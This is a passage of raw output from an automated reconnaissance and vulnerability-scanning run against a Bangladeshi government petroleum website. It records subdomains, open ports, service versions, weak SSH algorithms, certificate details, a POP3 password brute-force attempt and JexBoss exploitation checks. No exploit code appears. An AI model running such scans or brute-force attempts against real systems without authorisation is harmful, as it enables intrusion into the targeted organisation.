  765. -> Key 'censys_secret' has not been set
  766. Running collector: Wayback Machine... Done (5 hosts)
  767. Running collector: PTRArchive... Error
  768. -> PTRArchive returned unexpected response code: 502
  769. Running collector: PassiveTotal... Skipped
  770. -> Key 'passivetotal_key' has not been set
  771. Running collector: Shodan... Skipped
  772. -> Key 'shodan' has not been set
  773. Running collector: Riddler... Skipped
  774. -> Key 'riddler_username' has not been set
  775. Running collector: VirusTotal... Skipped
  776. -> Key 'virustotal' has not been set
  777. Running collector: Dictionary... Done (0 hosts)
  778. Running collector: HackerTarget... Done (1 host)
  779. Running collector: Google Transparency Report... Done (0 hosts)
  780. Running collector: Certificate Search... Done (0 hosts)
  781.  
  782. Resolving 5 unique hosts...
  783. 173.237.136.21 bpc.gov.bd
  784. 173.237.136.21 cpanel.bpc.gov.bd
  785. 173.237.136.21 mail.bpc.gov.bd
  786. 173.237.136.21 webmail.bpc.gov.bd
  787. 173.237.136.21 www.bpc.gov.bd
  788.  
  789. Found subnets:
  790.  
  791. - 173.237.136.0-255 : 5 hosts
  792.  
  793. Wrote 5 hosts to:
  794.  
  795. - file:///root/aquatone/www.bpc.gov.bd/hosts.txt
  796. - file:///root/aquatone/www.bpc.gov.bd/hosts.json
  802. /_/ takeover v0.5.0 - by @michenriksen
  803.  
  804. Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
  805. Loaded 25 domain takeover detectors
  806.  
  807. Identifying nameservers for www.bpc.gov.bd... Done
  808. Using nameservers:
  809.  
  810. - 50.22.35.226
  811. - 174.37.183.108
  812.  
  813. Checking hosts for domain takeover vulnerabilities...
  814.  
  815. Finished checking hosts:
  816.  
  817. - Vulnerable : 0
  818. - Not Vulnerable : 5
  819.  
  820. Wrote 0 potential subdomain takeovers to:
  821.  
  822. - file:///root/aquatone/www.bpc.gov.bd/takeovers.json
  823.  
  829. /_/ scan v0.5.0 - by @michenriksen
  830.  
  831. Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
  832.  
  833. Probing 2 ports...
  834. 80/tcp 173.237.136.21 www.bpc.gov.bd, webmail.bpc.gov.bd, cpanel.bpc.gov.bd and 2 more
  835. 443/tcp 173.237.136.21 www.bpc.gov.bd, cpanel.bpc.gov.bd, mail.bpc.gov.bd and 2 more
  836.  
  837. Wrote open ports to file:///root/aquatone/www.bpc.gov.bd/open_ports.txt
  838. Wrote URLs to file:///root/aquatone/www.bpc.gov.bd/urls.txt
  844. /_/ gather v0.5.0 - by @michenriksen
  845.  
  846. Processing 10 pages...
  847.  
  848. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  867. #######################################################################################################################################
  868. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
  869. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  870. Host is up (0.22s latency).
  871. Not shown: 459 closed ports, 3 filtered ports
  872. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  873. PORT STATE SERVICE
  874. 21/tcp open ftp
  875. 22/tcp open ssh
  876. 53/tcp open domain
  877. 80/tcp open http
  878. 110/tcp open pop3
  879. 143/tcp open imap
  880. 443/tcp open https
  881. 465/tcp open smtps
  882. 587/tcp open submission
  883. 993/tcp open imaps
  884. 995/tcp open pop3s
  885. 3306/tcp open mysql
  886. 8080/tcp open http-proxy
  887. 8443/tcp open https-alt
  888. #######################################################################################################################################
  889. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
  890. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  891. Host is up (0.20s latency).
  892. Not shown: 11 closed ports, 2 filtered ports
  893. PORT STATE SERVICE
  894. 53/udp open domain
  895. #######################################################################################################################################
  896. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:08 EST
  897. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  898. Host is up (0.22s latency).
  899.  
  900. PORT STATE SERVICE VERSION
  901. 21/tcp open ftp Pure-FTPd
  902. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  903. Device type: WAP
  904. Running: Linux 2.4.X|2.6.X
  905. OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
  906. OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
  907. Network Distance: 12 hops
  908.  
  909. TRACEROUTE (using port 21/tcp)
  910. HOP RTT ADDRESS
  911. 1 105.68 ms 10.251.200.1
  912. 2 105.73 ms 185.94.189.129
  913. 3 104.10 ms 185.206.226.109
  914. 4 104.97 ms 213.248.70.225
  915. 5 220.50 ms prs-bb3-link.telia.net (62.115.138.132)
  916. 6 221.80 ms 80.91.251.243
  917. 7 204.54 ms atl-b22-link.telia.net (62.115.125.191)
  918. 8 220.52 ms 80.91.246.75
  919. 9 221.15 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  920. 10 217.15 ms 207.210.229.6
  921. 11 221.88 ms 174.136.31.214
  922. 12 ... 30
  923. #######################################################################################################################################
  924. # general
  925. (gen) banner: SSH-2.0-OpenSSH_5.3
  926. (gen) software: OpenSSH 5.3
  927. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
  928. (gen) compression: enabled (zlib@openssh.com)
  929.  
  930. # key exchange algorithms
  931. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  932. `- [info] available since OpenSSH 4.4
  933.  
  934. # host-key algorithms
  935. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  936. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  937. `- [warn] using small 1024-bit modulus
  938. `- [warn] using weak random number generator could reveal the key
  939. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  940.  
  941. # encryption algorithms (ciphers)
  942. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  943. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  944. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  945.  
  946. # message authentication code algorithms
  947. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  948. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  949. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  950. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  951. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  952. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  953. `- [warn] using encrypt-and-MAC mode
  954. `- [info] available since OpenSSH 2.5.0
  955. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  956. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  957. `- [warn] using encrypt-and-MAC mode
  958. `- [info] available since OpenSSH 2.1.0
  959.  
  960. # algorithm recommendations (for OpenSSH 5.3)
  961. (rec) -ssh-dss -- key algorithm to remove
  962. (rec) -hmac-ripemd160 -- mac algorithm to remove
  963. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  964. #######################################################################################################################################
  965. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
  966. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  967. Host is up (0.22s latency).
  968.  
  969. PORT STATE SERVICE VERSION
  970. 22/tcp closed ssh
  971. Too many fingerprints match this host to give specific OS details
  972. Network Distance: 12 hops
  973.  
  974. TRACEROUTE (using port 22/tcp)
  975. HOP RTT ADDRESS
  976. 1 102.43 ms 10.251.200.1
  977. 2 102.68 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  978. 3 104.63 ms 185.206.226.109
  979. 4 104.66 ms 213.248.70.225
  980. 5 229.15 ms prs-bb4-link.telia.net (62.115.138.138)
  981. 6 218.30 ms 62.115.122.159
  982. 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
  983. 8 221.11 ms 80.91.246.75
  984. 9 217.75 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  985. 10 217.74 ms 207.210.229.6
  986. 11 222.77 ms 174.136.31.214
  987. 12 221.44 ms 173.237.136.21
  988. ######################################################################################################################################
  989. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
  990. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  991. Host is up (0.22s latency).
  992.  
  993. PORT STATE SERVICE VERSION
  994. 53/tcp open domain?
  995. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  996. | dns-nsec-enum:
  997. |_ No NSEC records found
  998. | dns-nsec3-enum:
  999. |_ DNSSEC NSEC3 not supported
  1000. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1001. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%)
  1002. No exact OS matches for host (test conditions non-ideal).
  1003. Network Distance: 12 hops
  1004.  
  1005. TRACEROUTE (using port 53/tcp)
  1006. HOP RTT ADDRESS
  1007. 1 109.51 ms 10.251.200.1
  1008. 2 109.59 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  1009. 3 104.85 ms 185.206.226.109
  1010. 4 104.87 ms 213.248.70.225
  1011. 5 221.30 ms prs-bb3-link.telia.net (62.115.138.132)
  1012. 6 219.96 ms 80.91.251.243
  1013. 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
  1014. 8 223.67 ms 80.91.246.75
  1015. 9 221.92 ms 213.248.71.138
  1016. 10 220.79 ms 207.210.229.6
  1017. 11 220.76 ms infweb6.smtpserve.com (72.29.120.126)
  1018. 12 220.80 ms 173.237.136.21
  1019. #######################################################################################################################################
  1020. ^ ^
  1021. _ __ _ ____ _ __ _ _ ____
  1022. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1023. | V V // o // _/ | V V // 0 // 0 // _/
  1024. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1025. <
  1026. ...'
  1027.  
  1028. WAFW00F - Web Application Firewall Detection Tool
  1029.  
  1030. By Sandro Gauci && Wendel G. Henrique
  1031.  
  1032. Checking http://www.bpc.gov.bd
  1033. The site http://www.bpc.gov.bd is behind a Trustwave ModSecurity
  1034. Number of requests: 6
  1035. ######################################################################################################################################
  1036.  
  1037. wig - WebApp Information Gatherer
  1038.  
  1039.  
  1040. Scanning http://www.bpc.gov.bd...
  1041. _________________ SITE INFO __________________
  1042. IP Title
  1043. 173.237.136.21 Bangladesh Petroleum Corporat
  1044.  
  1045. __________________ VERSION ___________________
  1046. Name Versions Type
  1047. PHP Platform
  1048. jQuery 1.6.3 JavaScript
  1049.  
  1050. ________________ INTERESTING _________________
  1051. URL Note Type
  1052. /login.php Login Page Interesting
  1053.  
  1054. ______________________________________________
  1055. Time: 1.6 sec Urls: 620 Fingerprints: 40401
  1056. ######################################################################################################################################
  1057. HTTP/1.1 200 OK
  1058. Date: Fri, 23 Nov 2018 05:31:07 GMT
  1059. Content-Type: text/html; charset=UTF-8
  1060. Content-Encoding: gzip
  1061. Connection: keep-alive
  1062. #######################################################################################################################################
  1063. --------------------------------------------------------------------------------------------------------------------------------------
  1064.  
  1065. [ ! ] Starting SCANNER INURLBR 2.1 at [23-11-2018 00:31:49]
  1066. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1067. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1068. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1069.  
  1070. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
  1071. [ INFO ][ DORK ]::[ site:www.bpc.gov.bd ]
  1072. [ INFO ][ SEARCHING ]:: {
  1073. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tn ]
  1074.  
  1075. [ INFO ][ SEARCHING ]::
  1076. -[:::]
  1077. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1078.  
  1079. [ INFO ][ SEARCHING ]::
  1080. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1081. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.tz ID: 012984904789461885316:oy3-mu17hxk ]
  1082.  
  1083. [ INFO ][ SEARCHING ]::
  1084. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1085.  
  1086. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  1087. [ INFO ] Not a satisfactory result was found!
  1088.  
  1089.  
  1090. [ INFO ] [ Shutting down ]
  1091. [ INFO ] [ End of process INURLBR at [23-11-2018 00:31:58]
  1092. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1093. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
  1094. |_________________________________________________________________________________________
  1095.  
  1096. \_________________________________________________________________________________________/
  1097. #######################################################################################################################################
  1098. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:32 EST
  1099. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  1100. Host is up (0.13s latency).
  1101.  
  1102. PORT STATE SERVICE VERSION
  1103. 110/tcp open pop3 Dovecot pop3d
  1104. | pop3-brute:
  1105. | Accounts: No valid accounts found
  1106. |_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
  1107. |_pop3-capabilities: USER CAPA RESP-CODES STLS TOP AUTH-RESP-CODE PIPELINING UIDL SASL(PLAIN LOGIN)
  1108. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1109. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
  1110. No exact OS matches for host (test conditions non-ideal).
  1111. Network Distance: 1 hop
  1112.  
  1113. TRACEROUTE (using port 80/tcp)
  1114. HOP RTT ADDRESS
  1115. 1 103.05 ms 173.237.136.21
  1116. #######################################################################################################################################
  1117.  
  1126. WAFW00F - Web Application Firewall Detection Tool
  1127.  
  1128. By Sandro Gauci && Wendel G. Henrique
  1129.  
  1130. Checking https://www.bpc.gov.bd
  1131. The site https://www.bpc.gov.bd is behind a Trustwave ModSecurity
  1132. Number of requests: 6
  1133. #######################################################################################################################################
  1134.  
  1135.  
  1136. AVAILABLE PLUGINS
  1137. -----------------
  1138.  
  1139. PluginHSTS
  1140. PluginChromeSha1Deprecation
  1141. PluginSessionResumption
  1142. PluginSessionRenegotiation
  1143. PluginCertInfo
  1144. PluginOpenSSLCipherSuites
  1145. PluginHeartbleed
  1146. PluginCompression
  1147.  
  1148.  
  1149.  
  1150. CHECKING HOST(S) AVAILABILITY
  1151. -----------------------------
  1152.  
  1153. www.bpc.gov.bd:443 => 173.237.136.21:443
  1154.  
  1155.  
  1156.  
  1157. SCAN RESULTS FOR WWW.BPC.GOV.BD:443 - 173.237.136.21:443
  1158. --------------------------------------------------------
  1159.  
  1160. * Deflate Compression:
  1161. OK - Compression disabled
  1162.  
  1163. * Session Renegotiation:
  1164. Client-initiated Renegotiations: OK - Rejected
  1165. Secure Renegotiation: OK - Supported
  1166.  
  1167. * Certificate - Content:
  1168. SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
  1169. Common Name: bpc.gov.bd
  1170. Issuer: bpc.gov.bd
  1171. Serial Number: 0136C4F852
  1172. Not Before: Jul 5 15:19:17 2018 GMT
  1173. Not After: Jul 5 15:19:17 2019 GMT
  1174. Signature Algorithm: sha256WithRSAEncryption
  1175. Public Key Algorithm: rsaEncryption
  1176. Key Size: 2048 bit
  1177. Exponent: 65537 (0x10001)
  1178. X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
  1179.  
  1180. * Certificate - Trust:
  1181. Hostname Validation: OK - Subject Alternative Name matches
  1182. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1183. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
  1184. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1185. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1186. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
  1187. Certificate Chain Received: ['bpc.gov.bd']
  1188.  
  1189. * Certificate - OCSP Stapling:
  1190. NOT SUPPORTED - Server did not send back an OCSP response.
  1191.  
  1192. * Session Resumption:
  1193. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1194. With TLS Session Tickets: OK - Supported
  1195.  
  1196. * SSLV2 Cipher Suites:
  1197. Server rejected all cipher suites.
  1198.  
  1199. * SSLV3 Cipher Suites:
  1200. Undefined - An unexpected error happened:
  1201. PSK-3DES-EDE-CBC-SHA timeout - timed out
  1202. EXP-RC2-CBC-MD5 timeout - timed out
  1203. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  1204. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  1205. EXP-DES-CBC-SHA timeout - timed out
  1206. EXP-ADH-RC4-MD5 timeout - timed out
  1207. EXP-ADH-DES-CBC-SHA timeout - timed out
  1208. EDH-RSA-DES-CBC-SHA timeout - timed out
  1209. EDH-DSS-DES-CBC-SHA timeout - timed out
  1210. ECDHE-RSA-NULL-SHA timeout - timed out
  1211. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  1212. DH-RSA-DES-CBC-SHA timeout - timed out
  1213. DH-DSS-DES-CBC-SHA timeout - timed out
  1214. DES-CBC3-SHA timeout - timed out
  1215. DES-CBC-SHA timeout - timed out
  1216. ADH-DES-CBC-SHA timeout - timed out
  1217.  
  1218.  
  1219.  
  1220. SCAN COMPLETED IN 49.26 S
  1221. -------------------------
  1222. Version: 1.11.12-static
  1223. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1224.  
  1225. Connected to 173.237.136.21
  1226.  
  1227. Testing SSL server www.bpc.gov.bd on port 443 using SNI name www.bpc.gov.bd
  1228.  
  1229. TLS Fallback SCSV:
  1230. Server supports TLS Fallback SCSV
  1231.  
  1232. TLS renegotiation:
  1233. Secure session renegotiation supported
  1234.  
  1235. TLS Compression:
  1236. Compression disabled
  1237.  
  1238. Heartbleed:
  1239. TLS 1.2 not vulnerable to heartbleed
  1240. TLS 1.1 not vulnerable to heartbleed
  1241. TLS 1.0 not vulnerable to heartbleed
  1242.  
  1243. Supported Server Cipher(s):
  1244. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1245. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1246. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1247. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1248. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1249. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1250. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1251. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1252. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1253. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1254.  
  1255. SSL Certificate:
  1256. Signature Algorithm: sha256WithRSAEncryption
  1257. RSA Key Strength: 2048
  1258.  
  1259. Subject: bpc.gov.bd
  1260. Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
  1261. Issuer: bpc.gov.bd
  1262.  
  1263. Not valid before: Jul 5 15:19:17 2018 GMT
  1264. Not valid after: Jul 5 15:19:17 2019 GMT
  1265.  
  1266.  
  1275. WAFW00F - Web Application Firewall Detection Tool
  1276.  
  1277. By Sandro Gauci && Wendel G. Henrique
  1278.  
  1279. Checking http://www.bpc.gov.bd:8080
  1280. The site http://www.bpc.gov.bd:8080 is behind a Trustwave ModSecurity
  1281. Number of requests: 6
  1282.  
  1283. http://www.bpc.gov.bd:8080 [403 Forbidden] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[403 Forbidden], nginx[1.14.0]
  1284.  
  1285. Version: 1.11.12-static
  1286. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1287.  
  1288. Connected to 173.237.136.21
  1289.  
  1290. Testing SSL server www.bpc.gov.bd on port 8080 using SNI name www.bpc.gov.bd
  1291.  
  1292. TLS Fallback SCSV:
  1293. Server does not support TLS Fallback SCSV
  1294.  
  1295. TLS renegotiation:
  1296. Session renegotiation not supported
  1297.  
  1298. TLS Compression:
  1299. Compression disabled
  1300.  
  1301. Heartbleed:
  1302. TLS 1.2 not vulnerable to heartbleed
  1303. TLS 1.1 not vulnerable to heartbleed
  1304. TLS 1.0 not vulnerable to heartbleed
  1305.  
  1306. Supported Server Cipher(s):
  1307. #######################################################################################################################################
  1308.  
  1309.  
  1310.  
  1311. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  1312. | * And others Java Deserialization Vulnerabilities * |
  1313. | |
  1314. | @author: João Filho Matos Figueiredo |
  1315. | @contact: joaomatosf@gmail.com |
  1316. | |
  1317. | @update: https://github.com/joaomatosf/jexboss |
  1318. #______________________________________________________#
  1319.  
  1320. @version: 1.2.4
  1321.  
  1322. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  1323.  
  1324.  
  1325. ** Checking Host: http://www.bpc.gov.bd:8080 **
  1326.  
  1327. [*] Checking admin-console: [ OK ]
  1328. [*] Checking Struts2: [ OK ]
  1329. [*] Checking Servlet Deserialization: [ OK ]
  1330. [*] Checking Application Deserialization: [ OK ]
  1331. [*] Checking Jenkins: [ OK ]
  1332. [*] Checking web-console: [ OK ]
  1333. [*] Checking jmx-console: [ OK ]
  1334. [*] Checking JMXInvokerServlet: [ OK ]
  1335.  
  1336.  
  1337. * Results:
  1338. The server is not vulnerable to bugs tested ... :D
  1339.  
  1340. * Info: review, suggestions, updates, etc:
  1341. https://github.com/joaomatosf/jexboss
  1342.  
  1345.  
  1346. + -- --=[Port 8180 closed... skipping.
  1347. + -- --=[Port 8443 opened... running tests...
  1348.  
  1357. WAFW00F - Web Application Firewall Detection Tool
  1358.  
  1359. By Sandro Gauci && Wendel G. Henrique
  1360.  
  1361. Checking http://www.bpc.gov.bd:8443
  1362. Generic Detection results:
  1363. No WAF detected by the generic detection
  1364. Number of requests: 14
  1365.  
  1366. http://www.bpc.gov.bd:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
  1367.  
  1368. Version: 1.11.12-static
  1369. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1370.  
  1371. Connected to 173.237.136.21
  1372.  
  1373. Testing SSL server www.bpc.gov.bd on port 8443 using SNI name www.bpc.gov.bd
  1374.  
  1375. TLS Fallback SCSV:
  1376. Server supports TLS Fallback SCSV
  1377.  
  1378. TLS renegotiation:
  1379. Secure session renegotiation supported
  1380.  
  1381. TLS Compression:
  1382. Compression disabled
  1383.  
  1384. Heartbleed:
  1385. TLS 1.2 not vulnerable to heartbleed
  1386. TLS 1.1 not vulnerable to heartbleed
  1387. TLS 1.0 not vulnerable to heartbleed
  1388.  
  1389. Supported Server Cipher(s):
  1390. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1391. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1392. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1393. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1394. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1395. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1396. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1397. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1398. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1399. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1400.  
  1401. SSL Certificate:
  1402. Signature Algorithm: sha256WithRSAEncryption
  1403. RSA Key Strength: 2048
  1404.  
  1405. Subject: bpc.gov.bd
  1406. Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
  1407. Issuer: bpc.gov.bd
  1408.  
  1409. Not valid before: Jul 5 15:19:17 2018 GMT
  1410. Not valid after: Jul 5 15:19:17 2019 GMT
  1411.  
  1412.  
  1413.  
  1414. AVAILABLE PLUGINS
  1415. -----------------
  1416.  
  1417. PluginCertInfo
  1418. PluginSessionRenegotiation
  1419. PluginOpenSSLCipherSuites
  1420. PluginHSTS
  1421. PluginSessionResumption
  1422. PluginChromeSha1Deprecation
  1423. PluginHeartbleed
  1424. PluginCompression
  1425.  
  1426.  
  1427.  
  1428. CHECKING HOST(S) AVAILABILITY
  1429. -----------------------------
  1430.  
  1431. www.bpc.gov.bd:8443 => 173.237.136.21:8443
  1432.  
  1433.  
  1434.  
  1435. SCAN RESULTS FOR WWW.BPC.GOV.BD:8443 - 173.237.136.21:8443
  1436. ----------------------------------------------------------
  1437.  
  1438. * Deflate Compression:
  1439. OK - Compression disabled
  1440.  
  1441. * Session Renegotiation:
  1442. Client-initiated Renegotiations: OK - Rejected
  1443. Secure Renegotiation: OK - Supported
  1444.  
  1445. * Certificate - Content:
  1446. SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
  1447. Common Name: bpc.gov.bd
  1448. Issuer: bpc.gov.bd
  1449. Serial Number: 0136C4F852
  1450. Not Before: Jul 5 15:19:17 2018 GMT
  1451. Not After: Jul 5 15:19:17 2019 GMT
  1452. Signature Algorithm: sha256WithRSAEncryption
  1453. Public Key Algorithm: rsaEncryption
  1454. Key Size: 2048 bit
  1455. Exponent: 65537 (0x10001)
  1456. X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
  1457.  
  1458. * Certificate - Trust:
  1459. Hostname Validation: OK - Subject Alternative Name matches
  1460. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1461. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
  1462. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1463. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1464. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
  1465. Certificate Chain Received: ['bpc.gov.bd']
  1466.  
  1467. * Certificate - OCSP Stapling:
  1468. NOT SUPPORTED - Server did not send back an OCSP response.
  1469.  
  1470. * Session Resumption:
  1471. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1472. With TLS Session Tickets: OK - Supported
  1473.  
  1474. * SSLV2 Cipher Suites:
  1475. Server rejected all cipher suites.
  1476.  
  1477. * SSLV3 Cipher Suites:
  1478. Undefined - An unexpected error happened:
  1479. PSK-3DES-EDE-CBC-SHA timeout - timed out
  1480. NULL-SHA256 timeout - timed out
  1481. NULL-SHA timeout - timed out
  1482. NULL-MD5 timeout - timed out
  1483. EXP-RC4-MD5 timeout - timed out
  1484. EXP-RC2-CBC-MD5 timeout - timed out
  1485. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  1486. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  1487. EXP-DES-CBC-SHA timeout - timed out
  1488. EXP-ADH-RC4-MD5 timeout - timed out
  1489. EXP-ADH-DES-CBC-SHA timeout - timed out
  1490. EDH-RSA-DES-CBC-SHA timeout - timed out
  1491. EDH-DSS-DES-CBC3-SHA timeout - timed out
  1492. EDH-DSS-DES-CBC-SHA timeout - timed out
  1493. ECDHE-RSA-NULL-SHA timeout - timed out
  1494. ECDHE-ECDSA-NULL-SHA timeout - timed out
  1495. ECDH-RSA-NULL-SHA timeout - timed out
  1496. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  1497. ECDH-ECDSA-NULL-SHA timeout - timed out
  1498. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  1499. DH-RSA-DES-CBC3-SHA timeout - timed out
  1500. DH-RSA-DES-CBC-SHA timeout - timed out
